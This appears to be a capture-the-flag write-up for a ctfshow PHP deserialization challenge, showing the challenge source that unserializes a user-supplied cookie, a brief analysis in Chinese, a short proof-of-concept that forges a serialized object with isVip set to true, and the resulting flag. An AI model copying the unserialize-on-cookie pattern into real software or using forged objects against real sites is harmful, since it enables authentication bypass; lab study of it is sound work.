nginx/1.16.1PHP/7.3.11

    1. <?php
    3. /*
    4. # -*- coding: utf-8 -*-
    5. # @Author: h1xa
    6. # @Date:   2020-12-02 17:44:47
    7. # @Last Modified by:   h1xa
    8. # @Last Modified time: 2020-12-02 19:29:02
    9. # @email: h1xa@ctfer.com
    10. # @link: https://ctfer.com
    12. */
    14. error_reporting(0);
    15. highlight_file(__FILE__);
    16. include('flag.php');
    18. class ctfShowUser{
    19.     public $username='xxxxxx';
    20.     public $password='xxxxxx';
    21.     public $isVip=false;
    23.     public function checkVip(){
    24.         return $this->isVip;
    25.     }
    26.     public function login($u,$p){
    27.         return $this->username===$u&&$this->password===$p;
    28.     }
    29.     public function vipOneKeyGetFlag(){
    30.         if($this->isVip){
    31.             global $flag;
    32.             echo "your flag is ".$flag;
    33.         }else{
    34.             echo "no vip, no flag";
    35.         }
    36.     }
    37. }
    39. $username=$_GET['username'];
    40. $password=$_GET['password'];
    42. if(isset($username) && isset($password)){
    43.     $user = unserialize($_COOKIE['user']);    
    44.     if($user->login($username,$password)){
    45.         if($user->checkVip()){
    46.             $user->vipOneKeyGetFlag();
    47.         }
    48.     }else{
    49.         echo "no vip,no flag";
    50.     }
    51. }

    分析:
    即要满足

    • 类成员 isViptrue
    • 传入的 username 和 类成员 username 相等
    • 传入的 password 和 类成员 password 相等

    username 和 password 已知,反序列化修改 isVip 即可

    poc

    1. <?php
    2. class ctfShowUser{}
    3. $user = new ctfShowUser();
    4. $user->isVip = true;
    5. echo urlencode(serialize($user));
    6. ?>

    image.png

    flag
    ctfshow{d59167b1-43df-4611-8907-3f77869aa875}